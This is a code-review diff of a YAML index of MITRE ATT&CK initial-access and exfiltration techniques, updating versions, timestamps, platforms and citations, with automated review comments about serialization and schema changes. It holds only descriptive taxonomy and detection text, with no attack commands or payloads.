name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59164,6 +60086,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -59172,18 +60095,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59215,14 +60138,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59233,6 +60153,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -59241,22 +60166,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -59281,36 +60202,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
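Review bot: converting the T1566 `description` from a wrapped double-quoted scalar to a `|-` block scalar is a welcome readability change and matches T1485, T1490 and T1529 in this file, but the file is still mixed: the T1566.001 and T1195 descriptions in earlier hunks remain wrapped double-quoted strings. If the serializer decides the style per object this is fine; if it is a manual edit, applying the same `|-` form to the remaining quoted descriptions would keep the file consistent. The new thread-hijacking sentence ends in `(Citation: phishing-krebs)`, so the matching `external_references` entry needs to be present for the citation to resolve.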
@@ -59339,9 +60243,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -59359,7 +60263,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -59397,11 +60305,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
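Review bot: `spec_version: '2.1'` is dropped from the technique object here, and the same removal appears in every technique touched by this patch while `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are kept. Because it is uniform across objects, this looks like a change in the index generator's field selection rather than an upstream data change; call that out in the PR description and check that nothing consuming these YAML indexes reads `spec_version`.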
@@ -59418,7 +60325,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -59428,7 +60334,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59437,19 +60343,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59497,11 +60401,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
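Review bot: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are emitted here after `object_marking_refs`, whereas the previous serialization placed them near the top of the T1078 object (the earlier hunks for this technique delete `x_mitre_attack_spec_version: 3.1.0` and `x_mitre_modified_by_ref` from those positions). The content change is a single version bump, but the key reordering inflates the diff and makes the real changes hard to audit; consider having the generator emit keys in a stable sorted order so future regenerations are review-friendly.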
@@ -59521,10 +60426,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -59557,7 +60460,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -59596,7 +60498,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -59611,7 +60513,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -59691,11 +60592,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -59751,11 +60651,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -59816,8 +60715,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -59845,13 +60744,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -59891,8 +60789,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -59900,13 +60800,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -59937,14 +60837,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60011,11 +60908,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60067,15 +60963,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60099,10 +60994,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -60121,13 +61015,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -60166,9 +61059,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -60218,7 +61110,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -60238,7 +61129,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60258,8 +61149,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
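Review bot: for T1029 the `modified` timestamp moves backwards from `2021-04-29T14:49:39.188Z` to `2020-03-28T00:26:48.769Z`, and both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with nothing replacing them. The same pattern (a shared `...T14:00:00.188Z` or `...T14:49:39.188Z` stamp replaced by an older, object-specific time, and the spec-version field gone) recurs for T1011.001, T1048.001, T1048.002, T1052, T1052.001 and T1030 later in this file. That is consistent with the generator now reading each object's own `modified` value instead of a collection-wide stamp, but it should be confirmed against the intended ATT&CK release so the index is not being regenerated from an older bundle; a sentence in the PR description would settle it.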
@@ -60306,7 +61195,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -60326,7 +61214,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60348,8 +61236,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -60403,7 +61289,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -60428,7 +61313,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -60463,12 +61348,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60493,11 +61376,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
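Review bot: `x_mitre_network_requirements: false` is removed from T1020.001 alongside the 1.2 to 1.3 version bump, and the same field disappears from T1048 later in the patch. If any tooling or documentation in this repo keys off that field (for example to flag techniques that need network access), it now needs a fallback for its absence; otherwise this is just the upstream schema dropping the field and can be noted as such.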
@@ -60540,9 +61422,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -60589,7 +61470,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -60615,7 +61495,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -60648,13 +61528,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -60703,12 +61581,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -60744,12 +61621,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -60758,7 +61634,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -60782,9 +61657,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -60807,7 +61681,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -60829,8 +61703,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -60881,7 +61753,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -60931,7 +61802,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -60956,7 +61826,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -60979,13 +61849,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61026,9 +61894,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
